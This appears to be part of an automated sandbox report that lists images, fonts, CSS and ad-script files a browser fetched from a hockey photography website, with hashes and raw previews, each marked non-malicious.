                                                                                                                                            Preview:.post-views.entry-meta>span{margin-right:0!important;font:16px;line-height:1}.post-views.entry-meta>span.post-views-icon.dashicons{display:inline-block;font-size:16px;line-height:1;text-decoration:inherit;vertical-align:middle}.post-views.load-dynamic .post-views-count{color:#fff0;transition:color 0.3s ease-in-out;position:relative}.post-views.load-dynamic.loaded .post-views-count{color:inherit}.post-views.load-dynamic.loading .post-views-count,.post-views.load-dynamic.loading .post-views-count:after{box-sizing:border-box}.post-views.load-dynamic .post-views-count:after{opacity:0;transition:opacity 0.3s ease-in-out;position:relative;color:#6610f2}.post-views.load-dynamic.loading .post-views-count:after{content:'';display:block;width:16px;height:16pxpx;border-radius:50%;border:2px solid currentColor;border-color:currentColor #fff0 currentColor #fff0;animation:pvc-loading 1s linear infinite;position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);opacity:1}@keyframes pvc-loading
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13650
                                                                                                                                            Entropy (8bit):7.946561283561103
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:711871BC0B37F251CBF4D7B696008219
                                                                                                                                            SHA1:56B7100B763AB0FB6785530EA88BACC9B8EDFCF2
                                                                                                                                            SHA-256:2FAF3D77A7128E0513AECA09BE06E3F4FB2CB5131132FBD7B132D5C6F77A5202
                                                                                                                                            SHA-512:3E43D486F31096ABF12D5288CED7EF6A2C31161A25BFE17D573211CB795645B77A4EACB3C84998E7940822A0B531EA57B33E209B9FD0AD8F10BD0B696EFC983A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z.......C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z..............."....................................................................................jz....1.....utOoN.....t.04}&,.acw.@....=F....}...l./..f.3...Ody.,....4...$Q.....U..=.?C..5../.g4..O...x...#.IMD.I+:..{..Us.P.>.nw...A.73..ca..}..Ts..!..y.HVl9z.....A.r.......=`t.MF._..........W....?...g..dDjN.u.^<.r8....b{F....s...1.'.lW.....+...HfrE,.t.]~........BQ..|...;......?P'...H.4.~m..o.g....b..)Q....,"......+6...Y......'O...6.&{31...~N..;.zz..y!...yF.\..P.O6.(.=JO,....8.....Y...xn....<.nj.wy.q.F......k.<Hn.7.us...>S3g...7G...dz.>DaU.S....XI.J.. ...(r.c..f\...1..N].....0{..(...].#..D..u w.._..>..!7...kB..c..o#..gG..*.9.....9
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4620
                                                                                                                                            Entropy (8bit):7.795091851156603
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:62CB1A8B012A443E6CF6F9AAABFAB144
                                                                                                                                            SHA1:FB62B0E45231CB6611DDE1A68F1AAD63877159FD
                                                                                                                                            SHA-256:CFE12D341C93697D1B3788A31C631C9EBF60611256E0FA892CDAE011F1495F28
                                                                                                                                            SHA-512:173C991891F37C32BF33E15C084ADAAD10CC9E9AAE7EC7825974D157CDDF643023FED2D3CEA86E6F1C2A3684B35E33EB9543875D216DC679DBB663EF3A649641
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z....".................................................................................5.<..1....=...A....].$...o@!.w...ZZk".,.e...R.....6K.s.........sb.Z#.a.U...rc...5.b..z....c...C..jp.&B.."!.l:..Hx.Z..?c|...9VX.w,.......`.1.@....Z[\.o.T.!%...cW...d..q.0.i`.r.O..\u..}../+.h.bB3...Z...8O.UL...=......&X. N.......:M.pT.[....6.tC....>....U.......*.............................1!...A"2.$B.............b.?.+uUr/....N.]'G7p.........D.i,8q~Q+4i...W...[.L#L.8.....cl..,...=.....'.64...)..m.u].T.S.].67..)..l...vj.....^..V....V.E.^C..I.#...:..A...k...-.-2/..J.....'Z8...awe6...f.....^>.|e..[..X5.{.............a.>.V...S)..s.)..sI.h..Y.x
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3938
                                                                                                                                            Entropy (8bit):4.676313468765363
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:99E4731BCCD0D8BADA1A24CBFA710156
                                                                                                                                            SHA1:5AE37F9A22B5123A75A0A9ADE6F0222631ADCC02
                                                                                                                                            SHA-256:42A9766B458CF20E536280B8A52122430DF3B247B75B1338447971DA03799DC0
                                                                                                                                            SHA-512:48AB925253EC59FBD54C556931DB8C35D53A6811EB90FD1F9CAFE521484B087C86B13D87B186FD1CD787B622C38E564AECE6C7822F7901D396740BAFF6AF4ADF
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/social-icons-widget-by-wpzoom/assets/css/wpzoom-social-icons-styles.css?ver=1732743635
                                                                                                                                            Preview:.entry-content ul li.zoom-social-icons-list,..zoom-social-icons-list {. list-style-type:none !important;.}...zoom-social_icons-list__item {. margin: 0 0 10px;.}...zoom-social_icons-list__label {. margin-left: 4px;.}...zoom-social-icons-list--no-labels .zoom-social_icons-list__item {. display: inline-block;. margin: 4px;. border: none;.}...zoom-social-icons-list .socicon,..zoom-social-icons-list .dashicons,..zoom-social-icons-list .genericon,..zoom-social-icons-list .academicons,..zoom-social-icons-list .fa.{. padding: 8px;. -moz-box-sizing: content-box;. -webkit-box-sizing: content-box;. box-sizing: content-box;. -moz-transition: opacity .2s;. -webkit-transition: opacity .2s;. transition: opacity .2s;. top: 0px;. vertical-align: middle;. width: 1em;. height: 1em;. line-height: 1em;. font-size: 1.2em;.}...zoom-social-icons-list--with-canvas .socicon,..zoom-social-icons-list--with-canvas .dashicons,..zoom-social-icons-list--with-ca
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):18596
                                                                                                                                            Entropy (8bit):7.988788312296589
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:C83E4437A53D7F849F9D32DF3D6B68F3
                                                                                                                                            SHA1:FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
                                                                                                                                            SHA-256:D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
                                                                                                                                            SHA-512:C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                                                                                                                                            Preview:wOF2......H...........H=................................|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q*.......u*D.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (10544)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10682
                                                                                                                                            Entropy (8bit):5.103165363656437
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4EEE50AC6F4F364BA3A284D0753DDAE3
                                                                                                                                            SHA1:A8E7E824E6824AE0B370FF36E2C07CA07276FAE0
                                                                                                                                            SHA-256:B936DB5880AA9B6B2F26A8D32FC2B689FB75F69D971B94194F16DBA801221FFE
                                                                                                                                            SHA-512:AD7154338F51A1FD2745D1321412F1D418B76CD99F8B439E5ECBD8CDAA7AC09355EE30D4F26044988ACD739BA8B059CA91316798CB0E9B6432D86F006AD49B02
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0
                                                                                                                                            Preview:/*! dialogs-manager v4.9.0 | (c) Kobi Zaltzberg | https://github.com/kobizz/dialogs-manager/blob/master/LICENSE.txt. 2021-08-15 18:13 */.!function(p,t){"use strict";var y={widgetsTypes:{},createWidgetType:function(t,e,n){n=n||this.Widget;function i(){n.apply(this,arguments)}var o=i.prototype=new n(t);return o.types=o.types.concat([t]),p.extend(o,e),(o.constructor=i).extend=function(t,e){return y.createWidgetType(t,e,i)},i},addWidgetType:function(t,e,n){return e&&e.prototype instanceof this.Widget?this.widgetsTypes[t]=e:this.widgetsTypes[t]=this.createWidgetType(t,e,n)},getWidgetType:function(t){return this.widgetsTypes[t]}};y.Instance=function(){var n=this,e={},i={};this.createWidget=function(t,e){t=new(y.getWidgetType(t))(t);return t.init(n,e=e||{}),t},this.getSettings=function(t){return t?i[t]:Object.create(i)},this.init=function(t){return p.extend(i,{classPrefix:"dialog",effects:{show:"fadeIn",hide:"fadeOut"}},t),e.body=p("body"),n},n.init()},y.Widget=function(n){function e(t,e){var
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):16632
                                                                                                                                            Entropy (8bit):7.977337146567982
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:75AA8C890068C17BE7647B6D2DE0624D
                                                                                                                                            SHA1:39FE8896732C1D0905882474DD89799A46446E67
                                                                                                                                            SHA-256:B262EF8A158E74A346D6E85267DCC6026C815D17BEEB69CA090FA7424B0233CF
                                                                                                                                            SHA-512:F827B12AB30F2EDE55897D3737CC3094779CC6A51702ADCC8C686E24A3EFF36E68D7B6C443EE941846203F9830D2C97488D7400F9C00E129FD6012C3B8CDAC3C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_0362.jpg
                                                                                                                                            Preview:RIFF.@..WEBPVP8X..............VP8 .@.......*....>.D.I...$).L...bk...\rQIa....../.....I..[.../n.S...z..+...{.......Y{...........[OH..@?....P....................`.....4...|..c._.......y..i._.}..w./.}B.......P...........V~...~..y.C.w...=........7..C.]..|.~......m..<|....r..C.....dk..u..Q7Z....U.....<.c%0Ls.&.x.G.;c...h...{.7...ft$........_...G.r.....A.u.X")..T.0I........<...>]..+..H%-F...(.../.:\..bg...u-..e.P..4..:.r....C....A.m.[..Q.G......."....C.[.. ..N..9.......9....W.].:.V..d...N.{p.[.P..U.z..3k..7.V..[WU..8...p.um..OeO..k....o}.E.....\.....#.5E...<.Y+#..N[..Q.h..LB.o.n....Ud..'.k..v...u....f...5c..tA._.Z.!.e.V.7..RC.F0y.-......&.J.j;..Z.&'4..R.F...>?..........aE.A.d....]....WeX._...v..q...{.Z'1`...7a..iE.....W.....Dw..OfE.........m...*$-..M..Q...b...,.h.........nfl..V..^.c..*.!{...IO....a....|..W..#...U...c..9....R.G2..L.[.(.\...t...}.rJ....w...%.?[3.......np..........}.v.L..`..l..VahuE..^...1.......to...'.8.0/p.'...Mr..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):812
                                                                                                                                            Entropy (8bit):6.960814082235181
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E0F98106FEE0229D473A4A287159DE92
                                                                                                                                            SHA1:74ED4E8E2F8A75137263338EFE252036B11976D8
                                                                                                                                            SHA-256:C95C995D1813D6348C83F91C2C2C95F4FF6EA275184FCE87809B50B49B6B51CC
                                                                                                                                            SHA-512:0CD5BC4A2616E702D58EA2530322C0B532483B9615373B59B935B0ED68E6AD43BC5EED3CE219F17D7F46B39BD00921C269130C04BD133FFE5147D3E883A8FAE3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:32/h:32/q:mauto/ig:avif/https://phothockey.ch/wp-content/uploads/2020/08/cropped-icone-phothockey-1.png
                                                                                                                                            Preview:RIFF$...WEBPVP8X..............ALPH,.....km.![o........0"....m..}b.}.....;......h....7.........Pe..~_b...0_R...Bp.$....C...*.t..?,.>..*..=...,U>.)..#0.....k.`....#)QE.....S...g...i..A.9UY.9..-."....).v=QH.u.A......l. ."..Qi...B. .x.....LH!..^..r..%.+v.5....b..0pI!//.....|9N...?..r.......o.RR.9.,.t.>....sA....c(\..<y....'.....VP8 .........* . .>.B.I...!(.P...i...?.f/Z..(.]Eg...j6..5Q.wc.....k2u.m..\..0.....%V.0_..g.p.X... Q..MT.+.#.J..."Z..T7W.n......".S@4..... ....WC..F4u.n....*6p.P3...1...C..../u.}.x....dO..}.f.....(..ea9..Nr.j.j.g..~z...h....8.......y8.u.....;.j.7....p.L.'.!..e.Y.....EXIF....Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ........... .......
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1055)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2690
                                                                                                                                            Entropy (8bit):5.398083497267717
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2669D16AAE166D157B8434762A199620
                                                                                                                                            SHA1:CA7E08D45D0D469ED57825C28CB214F421311F97
                                                                                                                                            SHA-256:944A37F694B55DE268A0BF52DBAE4E12F12C4AE09EE5C8D213BA05075C2865DD
                                                                                                                                            SHA-512:51CCCC87145F0B0098B81BEA1506C726BB249E65F3B5FCC853F1FC4D4E55716F1F9318E43A2A0B31DFC4C968C14EBAF1EEFB9331C6DCE1B561459883DA7E9432
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://tpc.googlesyndication.com/pagead/js/r20241212/r20110914/client/window_focus_fy2021.js
                                                                                                                                            Preview:(function(){'use strict';function f(a,b,e){a.addEventListener&&a.addEventListener(b,e,!1)};/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .function g(a,b,e){if(Array.isArray(b))for(let c=0;c<b.length;c++)g(a,String(b[c]),e);else b!=null&&e.push(a+(b===""?"":"="+encodeURIComponent(String(b))))};function l(a=document){return a.createElement("img")};function m(a,b,e=null,c=!1){n(a,b,e,c)}function n(a,b,e,c){a.google_image_requests||(a.google_image_requests=[]);const d=l(a.document);if(e||c){const k=h=>{e&&e(h);if(c){h=a.google_image_requests;const v=Array.prototype.indexOf.call(h,d,void 0);v>=0&&Array.prototype.splice.call(h,v,1)}d.removeEventListener&&d.removeEventListener("load",k,!1);d.removeEventListener&&d.removeEventListener("error",k,!1)};f(d,"load",k);f(d,"error",k)}d.src=b;a.google_image_requests.push(d)};function p(a=null){return a&&a.getAttribute("data-jc")==="22"?a:document.querySelector('[data-jc="22"]')};var q=document,r=window;functi
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10980
                                                                                                                                            Entropy (8bit):7.970768086950365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2901CD748403156FFAAA71D1FE29D5AC
                                                                                                                                            SHA1:6611D5711F83940DB34EF9183127AE047C62403B
                                                                                                                                            SHA-256:7B8C748C7B9CCC24D2384E6655B9D5A7298A66B5C6C8D0BA153441F2D6BF0ED6
                                                                                                                                            SHA-512:2BBB854F5FE0D9F719561E680AABF7C58183F633413720253994117BEF61603B2B987A6E9696431A0B1AF457651E02A725A6A36FEF9FFDF864E2D44867C09A5F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/10/IMG_8411.jpg
                                                                                                                                            Preview:RIFF.*..WEBPVP8X..............VP8 .).......*....>.D.J...'(.mh...gn1....c..`.?..\.>.....7..W.I....+...Mj..x.b<W/.3...~{.@.??.Y.?.z......<.j2Y../.8...g.c.N2'.....1.....ku..........3...3.....3.n$..M..S....-D..x._..... . ...$o.!va.Y..}.=....].o.....Q.:.".%..II..09..X...3p...@.n.o......L.5k.G..f5.)"=.#.....1...>[t..j...a.....14.$y..P....~....z...s4....U..Q!..:.l..|..#..T4...ny.$.S.ce..h...v.]^........1.{.<g..[..^.......(F6g._id.....r...O...Ar./..T.....w.9V.......-..l...v..].G.I ..a...p.....6..&$..6.@0..:...u.Q...2.-p.!.M..2$....V....{J.`...2.R.P....~.#....b+....9..[.h..YS.riW..Z....e.<..wi...l.'+l^.:T...~yK.-...^a?....}.4=......(...r...Vr/...O.....w...t"A...q3..^.b'..I..D.u...=..9...$..0.SE..5..m(...g5.Zx.F...y=..._.u.n8....Q.0........s.......v`6.....O..e.H..^J.'...t.j.2...._.H.......O.......,=..bR&z..Y..2Il.U...8.p.o..H.%V..h.D.#.7]..-=..9.y^..M...G.A.....F8.b.h...j$.c.....OI.F......[.}...3..r.mnv.&0!........~..K.......)......kQ-Ph....AxF.|.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14173
                                                                                                                                            Entropy (8bit):7.9488244897399465
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:1A5BA62369958389F703788CAEF50445
                                                                                                                                            SHA1:74B06B5C7A59CC9FDC927952D2851D0B9A02058B
                                                                                                                                            SHA-256:7EB9F157DD7A9C701C2812C6CC020FF5350262457955159444DEB47B68B11D00
                                                                                                                                            SHA-512:A83F3E7B76C29A8375B85726BF99D53CF3B587C124F4BD64190A7EEA2FF55D988CBDB1DC0277D4F699998E4DF9DB449EECB34E706044589C72F14B13A9641ADC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||............"................................................................................e...".b..i6.....H......bC`..7.m@..ZK.T....:...vg...z...IcP.....I..an\....+.v.\*..[.RfOJ.t...R.Qp.......d.....x..b....l.#k.LC1>.dY...-.e.C.mi^.%^..x.{?5..P.R.W..>w..f..?]>;...NJ..n0.:..af......Gn.m.aP.yXa[...).N....A._%...|..........0..)q.....a.....P.N.....Y.$......1.sG.<.x/.'?\.z.h...PP.[.9....9.}r.^U...t............' .F.:.x..^..o...]Q:,...+s.h$8.|2v.<.4.v..BF.4.`.O.........4...}T...........#..K..@..%;h+....S.....w.[Y6..Y.Y..n.t...Py.3@......5..M...r.L1.1.r....aNw...,.W[.l9R....K.my......U5Ft... ..o.JW............Q...).z....V.-.....l.^7...K~..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (2292)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):23142
                                                                                                                                            Entropy (8bit):5.506833894491201
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:F2C9765E4E82C0D058935C13C7A0E661
                                                                                                                                            SHA1:866CC425B3930C27D15C549AEA1F620D423F0092
                                                                                                                                            SHA-256:B39FDAABFE63FACA7D21B1EE38C593BB29663D70DE9938ECA8DD6159F405FE9A
                                                                                                                                            SHA-512:500B012089A7A1C7C9351F2B6DA477DDDB2AFC9F9C6CA28DFC0BBD3035058B4B5E7EA524719956745114CDA66836FCF0E5C380E80E21204264D59E1FA4F789AC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://tpc.googlesyndication.com/pagead/js/r20241212/r20110914/abg_lite_fy2021.js
                                                                                                                                            Preview:(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;function aa(a){m.setTimeout(()=>{throw a;},0)};var ba,n;a:{for(var ca=["CLOSURE_FLAGS"],p=m,da=0;da<ca.length;da++)if(p=p[ca[da]],p==null){n=null;break a}n=p}var fa=n&&n[610401301];ba=fa!=null?fa:!1;var q;const ha=m.navigator;q=ha?ha.userAgentData||null:null;function ia(a){return ba?q?q.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function u(a){var b;a:{if(b=m.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function v(){return ba?!!q&&q.brands.length>0:!1}function ja(){return v()?ia("Chromium"):(u("Chrome")||u("CriOS"))&&!(v()?0:u("Edge"))||u("Silk")};function ka(a){ka[" "](a);return a}ka[" "]=function(){};!u("Android")||ja();ja();u("Safari")&&(ja()||(v()?0:u("Coast"))||(v()?0:u("Opera"))||(v()?0:u("Edge"))||(v()?ia("Microsoft Edge"):u("Edg/"))||v()&&ia("Opera"));let la;var w=Symbol(),ma=Symbol();function na(a,b){b[w]=(a|0)&-30975}fu
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):520
                                                                                                                                            Entropy (8bit):6.043611598080174
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:AE381F96C3FD9E3534BCF3B832377BDE
                                                                                                                                            SHA1:8BB508422484A3AD25DC008D5CDD2D9E58508236
                                                                                                                                            SHA-256:27642CFD4E785F1CBF5AC870484F10C8E199809D0DCC1C43BFB1C66E595F6911
                                                                                                                                            SHA-512:21D182A9D3A5C32F1E0D34290752717A81E9A4D1A62F022F69341CE489F310D78910623CB8AA2ACBD39B2C628CABA845D5A60B1BFFE6D08CEB2A2124E7B8109D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:32/h:32/q:mauto/ig:avif/https://phothockey.ch/wp-content/plugins/gtranslate/flags/32/de.png
                                                                                                                                            Preview:RIFF....WEBPVP8X..............ALPHL....w`.m.JI!........W....&.@H*....]..d.C..."h!....cD.'.\.E..bT+...C..1.s*....VP8 .........* . .>.@.H%.#!0.....l........m...J.....P.{&\..@.....h..5.NLL...}=u..)-_..+......r......e._...>.%..<...@....?..$....:*4.=.3.S.N...Zob...Q..)..D.A...k7.........G....eW....G.g.S......>ed. .EXIF....Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ........... .......
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4634
                                                                                                                                            Entropy (8bit):7.804304397401623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:08703C96C9BE01E925390C8B284FC478
                                                                                                                                            SHA1:1500640734F7BE29AB5E30BE72CFAC69B40C4C6D
                                                                                                                                            SHA-256:E52D3F1383BBEBFACFC1D1CE14D3BCCB794399E0E1867F26E612F7110E820D46
                                                                                                                                            SHA-512:40AF31F98144FEBB24D07C9620BCFB1A0572D93F03D18BADB654ED4A7E3535C46F3EF83E3F7BB7DB0848BFE167B15CB35869325C2CADF60192D54A635E07BE34
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."................................................................................../.......Y...8.-e...G..c...y.].!.....E...a..\u.;.{S..g..I"M...lI.K.*{.mvr..O..#b..}..m....t<....#.......7D...,azx..7[.-.....M.m.....g$`.@*.q.G.I..3r....>.w.3..}F+W....fg3.....v.36(...Yv...\.c..@d1.......BY....e...#.*............}.....#1H..g&<z...w......=.?...(............................!..1.. "2A...........Mt..{....7..a....N./...EP$.....9......*.....jhq..i.)N.|w....+,_.z\Q4..n..,.....*...oJ..M...[.2..8N..2o1.!......|.?.:,.%T"d.UR.F....P..t../|:L'..3...F...h..#.Ey..=...N...!..]...m.:_.,.Il..e..O.(.9".s.<..1..D..5BP...v..f.GC.._6.%...U..F.d8
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):243758
                                                                                                                                            Entropy (8bit):5.741855727936379
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:0F3B2240FDFD2D59FF1CC8FA3055710D
                                                                                                                                            SHA1:3F3DE3A33C797DC389FEAB75681AFE01D86D234D
                                                                                                                                            SHA-256:BA6A71AD515763E4714B2615B2B622BA07FB7DFD79EBD1BC46E2C77B4EB36978
                                                                                                                                            SHA-512:5F9DC6FE089149D6348A8C964D3B5C7D19499263A9ACF53CA7F6FF8275B3174F0388F31FB9CAD27CE7933D8E4D20FA2BD196A955EDE36E731A6C51BAC83CF676
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
